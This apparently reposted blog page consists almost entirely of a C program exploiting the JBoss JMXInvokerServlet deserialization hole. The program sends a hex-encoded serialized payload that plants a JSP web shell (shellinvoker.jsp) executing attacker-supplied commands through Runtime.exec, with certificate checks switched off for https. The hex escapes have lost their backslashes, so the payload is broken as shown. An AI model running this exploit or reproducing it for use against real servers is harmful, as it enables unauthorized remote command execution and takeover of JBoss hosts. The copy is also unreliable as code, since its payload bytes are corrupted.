• Jboss remote getshell (JMXInvokerServlet) vc版


    #include "stdafx.h"
    #include <Windows.h>
    #include <stdio.h>
    #include <winhttp.h>
    #include <comdef.h>
    #pragma comment (lib,"Winhttp.lib")
    
    char shell_invoke[] = ( 
        "xacxedx00x05x73x72x00x29x6fx72x67x2ex6ax62x6fx73" ///shellinvoker/shellinvoker.jsp
        "x73x2ex69x6ex76x6fx63x61x74x69x6fx6ex2ex4dx61x72"
        "x73x68x61x6cx6cx65x64x49x6ex76x6fx63x61x74x69x6f"
        "x6exf6x06x95x27x41x3exa4xbex0cx00x00x78x70x70x77"
        "x08x78x94x98x47xc1xd0x53x87x73x72x00x11x6ax61x76"
        "x61x2ex6cx61x6ex67x2ex49x6ex74x65x67x65x72x12xe2"
        "xa0xa4xf7x81x87x38x02x00x01x49x00x05x76x61x6cx75"
        "x65x78x72x00x10x6ax61x76x61x2ex6cx61x6ex67x2ex4e"
        "x75x6dx62x65x72x86xacx95x1dx0bx94xe0x8bx02x00x00"
        "x78x70xe3x2cx60xe6x73x72x00x24x6fx72x67x2ex6ax62"
        "x6fx73x73x2ex69x6ex76x6fx63x61x74x69x6fx6ex2ex4d"
        "x61x72x73x68x61x6cx6cx65x64x56x61x6cx75x65xeaxcc"
        "xe0xd1xf4x4axd0x99x0cx00x00x78x70x7ax00x00x02xc6"
        "x00x00x02xbexacxedx00x05x75x72x00x13x5bx4cx6ax61"
        "x76x61x2ex6cx61x6ex67x2ex4fx62x6ax65x63x74x3bx90"
        "xcex58x9fx10x73x29x6cx02x00x00x78x70x00x00x00x04"
        "x73x72x00x1bx6ax61x76x61x78x2ex6dx61x6ex61x67x65"
        "x6dx65x6ex74x2ex4fx62x6ax65x63x74x4ex61x6dx65x0f"
        "x03xa7x1bxebx6dx15xcfx03x00x00x78x70x74x00x2cx6a"
        "x62x6fx73x73x2ex61x64x6dx69x6ex3ax73x65x72x76x69"
        "x63x65x3dx44x65x70x6cx6fx79x6dx65x6ex74x46x69x6c"
        "x65x52x65x70x6fx73x69x74x6fx72x79x78x74x00x05x73"
        "x74x6fx72x65x75x71x00x7ex00x00x00x00x00x05x74x00"
        "x10x73x68x65x6cx6cx69x6ex76x6fx6bx65x72x2ex77x61"
        "x72x74x00x0cx73x68x65x6cx6cx69x6ex76x6fx6bx65x72"
        "x74x00x04x2ex6ax73x70x74x01x79x3cx25x40x20x70x61"
        "x67x65x20x69x6dx70x6fx72x74x3dx22x6ax61x76x61x2e"
        "x75x74x69x6cx2ex2ax2cx6ax61x76x61x2ex69x6fx2ex2a"
        "x22x25x3ex3cx70x72x65x3ex3cx25x69x66x28x72x65x71"
        "x75x65x73x74x2ex67x65x74x50x61x72x61x6dx65x74x65"
        "x72x28x22x70x70x70x22x29x20x21x3dx20x6ex75x6cx6c"
        "x20x26x26x20x72x65x71x75x65x73x74x2ex67x65x74x48"
        "x65x61x64x65x72x28x22x75x73x65x72x2dx61x67x65x6e"
        "x74x22x29x2ex65x71x75x61x6cx73x28x22x6ax65x78x62"
        "x6fx73x73x22x29x20x29x20x7bx20x50x72x6fx63x65x73"
        "x73x20x70x20x3dx20x52x75x6ex74x69x6dx65x2ex67x65"
        "x74x52x75x6ex74x69x6dx65x28x29x2ex65x78x65x63x28"
        "x72x65x71x75x65x73x74x2ex67x65x74x50x61x72x61x6d"
        "x65x74x65x72x28x22x70x70x70x22x29x29x3bx20x44x61"
        "x74x61x49x6ex70x75x74x53x74x72x65x61x6dx20x64x69"
        "x73x20x3dx20x6ex65x77x20x44x61x74x61x49x6ex70x75"
        "x74x53x74x72x65x61x6dx28x70x2ex67x65x74x49x6ex70"
        "x75x74x53x74x72x65x61x6dx28x29x29x3bx20x53x74x72"
        "x69x6ex67x20x64x69x73x72x20x3dx20x64x69x73x2ex72"
        "x65x61x64x4cx69x6ex65x28x29x3bx20x77x68x69x6cx65"
        "x20x28x20x64x69x73x72x20x21x3dx20x6ex75x6cx6cx20"
        "x29x20x7bx20x6fx75x74x2ex70x72x69x6ex74x6cx6ex28"
        "x64x69x73x72x29x3bx20x64x69x73x72x20x3dx20x64x69"
        "x73x2ex72x65x61x64x4cx69x6ex65x28x29x3bx20x7dx20"
        "x7dx25x3ex73x72x00x11x6ax61x76x61x2ex6cx61x6ex67"
        "x2ex42x6fx6fx6cx65x61x6excdx20x72x80xd5x9cxfaxee"
        "x02x00x01x5ax00x05x76x61x6cx75x65x78x70x01x75x72"
        "x00x13x5bx4cx6ax61x76x61x2ex6cx61x6ex67x2ex53x74"
        "x72x69x6ex67x3bxadxd2x56xe7xe9x1dx7bx47x02x00x00"
        "x78x70x00x00x00x05x74x00x10x6ax61x76x61x2ex6cx61"
        "x6ex67x2ex53x74x72x69x6ex67x71x00x7ex00x0fx71x00"
        "x7ex00x0fx71x00x7ex00x0fx74x00x07x62x6fx6fx6cx65"
        "x61x6ex63x79xb8x87x78x77x08x00x00x00x00x00x00x00"
        "x01x73x72x00x22x6fx72x67x2ex6ax62x6fx73x73x2ex69"
        "x6ex76x6fx63x61x74x69x6fx6ex2ex49x6ex76x6fx63x61"
        "x74x69x6fx6ex4bx65x79xb8xfbx72x84xd7x93x85xf9x02"
        "x00x01x49x00x07x6fx72x64x69x6ex61x6cx78x70x00x00"
        "x00x04x70x78");
    
    void request_https(wchar_t* Host,int port)
    {
        DWORD dwSize = 0;
        DWORD dwDownloaded = 0;
        LPSTR pszOutBuffer;
        BOOL bResults = FALSE;
        HINTERNET hSession = NULL,
            hConnect = NULL,
            hRequest = NULL;
    
        // Use WinHttpOpen to obtain a session handle.
        hSession = WinHttpOpen( L"WinHTTP Example/1.0",
            WINHTTP_ACCESS_TYPE_DEFAULT_PROXY,
            WINHTTP_NO_PROXY_NAME,
            WINHTTP_NO_PROXY_BYPASS, 0);
    
        // Specify an HTTP server.
        if (hSession)
            hConnect = WinHttpConnect( hSession,Host,
            port, 0);
    
        // Create an HTTP request handle.
        if (hConnect)
            hRequest = WinHttpOpenRequest( hConnect, L"POST",L"/invoker/JMXInvokerServlet",
            NULL, WINHTTP_NO_REFERER,
            WINHTTP_DEFAULT_ACCEPT_TYPES,
            WINHTTP_FLAG_SECURE);
    
        DWORD options = SECURITY_FLAG_IGNORE_CERT_CN_INVALID |
            SECURITY_FLAG_IGNORE_CERT_DATE_INVALID |
            SECURITY_FLAG_IGNORE_UNKNOWN_CA ;
    
        if( hRequest )
            bResults = WinHttpAddRequestHeaders( hRequest,
            L"Content-Type: application/x-java-serialized-object; class=org.jboss.invocation.MarshalledValue"
            ,(ULONG)-1L,WINHTTP_ADDREQ_FLAG_ADD );
    
        bResults = WinHttpAddRequestHeaders( hRequest, 
            L"Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2",(ULONG)-1L,WINHTTP_ADDREQ_FLAG_ADD );
    
        bResults = WinHttpSetOption( hRequest, WINHTTP_OPTION_SECURITY_FLAGS ,
            (LPVOID)&options, sizeof (DWORD) );
    
        if(bResults == FALSE){
            printf("Error in WinHttpQueryOption WINHTTP_OPTION_SECURITY_FLAGS: %ld
    ",GetLastError());
        }
    
        // Send a request.
        if (hRequest){
            bResults = WinHttpSendRequest( hRequest,
                WINHTTP_NO_ADDITIONAL_HEADERS, 0,
                shell_invoke, WORD(sizeof(shell_invoke)),
                sizeof(shell_invoke), 0);
            if(bResults == FALSE)
                printf ("WinHttpSendRequest error: %ld
    ",GetLastError());
        }
    
        if( hRequest ) WinHttpCloseHandle( hRequest );
        if( hConnect ) WinHttpCloseHandle( hConnect );
        if( hSession ) WinHttpCloseHandle( hSession );
    }
    
    
    void request_http(wchar_t* Host, int Port)
    {
        DWORD dwSize = sizeof(DWORD);
        DWORD dwStatusCode = 0;
        BOOL  bResults = FALSE;
        HINTERNET hSession = NULL,
        hConnect = NULL,
        hRequest = NULL;
    
        // Use WinHttpOpen to obtain a session handle.
        hSession = WinHttpOpen(L"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.118 Safari/537.36", 
            WINHTTP_ACCESS_TYPE_DEFAULT_PROXY,
            WINHTTP_NO_PROXY_NAME, 
            WINHTTP_NO_PROXY_BYPASS,
            0 );
    
        // Specify an HTTP server.
        if( hSession )
            hConnect = WinHttpConnect( hSession,
            Host,
            Port,
            0 );
    
        // Create an HTTP Request handle.
        if( hConnect )
            hRequest = WinHttpOpenRequest( hConnect,
            L"POST",L"/invoker/JMXInvokerServlet",  // /invoker/JMXInvokerServlet
            NULL,
            WINHTTP_NO_REFERER, 
            WINHTTP_DEFAULT_ACCEPT_TYPES,
            0 );
        // Add a request header.
        if( hRequest )
            bResults = WinHttpAddRequestHeaders( hRequest,
            L"Content-Type: application/x-java-serialized-object; class=org.jboss.invocation.MarshalledValue"
            ,(ULONG)-1L,WINHTTP_ADDREQ_FLAG_ADD );
    
            bResults = WinHttpAddRequestHeaders( hRequest, 
                L"Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2",(ULONG)-1L,WINHTTP_ADDREQ_FLAG_ADD );
        // Send a Request.
        if( bResults ) 
            bResults = WinHttpSendRequest( hRequest, 
            WINHTTP_NO_ADDITIONAL_HEADERS,
            0,
            shell_invoke,WORD(sizeof(shell_invoke)),
            sizeof(shell_invoke),
            0 );
    
        // Report any errors.
        if( !bResults )
            printf( "Error %d has occurred.
    ", GetLastError( ) );
    
        // Close open handles.
        if( hRequest ) WinHttpCloseHandle( hRequest );
        if( hConnect ) WinHttpCloseHandle( hConnect );
        if( hSession ) WinHttpCloseHandle( hSession );
        //return 0;
    }
    
    int main(int argc, char* argv[])
    {
    
        if (argc < 4)
        {
            printf("[*]:%s Jboss Exploit remote getshell
    ",argv[0]);
            printf("[*]:%s Remote_Host Remote_ip http/https 
    ",argv[0]);
            printf("[*]:Getshell Path:/shellinvoker/shellinvoker.jsp
    ");
            return -1;
        }
        wchar_t Host[MAX_PATH] = {0};
        wchar_t procotol[MAX_PATH] = {0};
        wsprintfW(Host, L"%S", argv[1]);
        wsprintfW(procotol,L"%S",argv[3]);
        printf("
    [*]:Host:%S procotol:%S 
    ", Host,procotol);
    
        if (0 == lstrcmpi(procotol, L"http"))
        {
            request_http(Host,atoi(argv[2]));
    
        }else if(0 == lstrcmpi(procotol, L"https"))
        {
            request_https(Host,atoi(argv[2]));
        }else
        {
            printf("
    Unknown option.
    ");
            return 0;
        }
        return 0;
    }

  • 相关阅读:
    java.sql.SQLException: The server time zone value 'Öйú±ê׼ʱ¼ä'.. 问题解决方法
    Mysql存储引擎federated
    实习心语
    Linux版本CentOS、Ubuntu和Debian的异同
    Ubuntu忘记MySQL密码重设方法
    运行时异常和一般异常
    网络爬虫-正方教务系统登录
    大四心语
    缓存更新的套路
    (String)、toString、String.valueOf的区别
  • 原文地址:https://www.cnblogs.com/killbit/p/4489664.html
Copyright © 2020-2023  润新知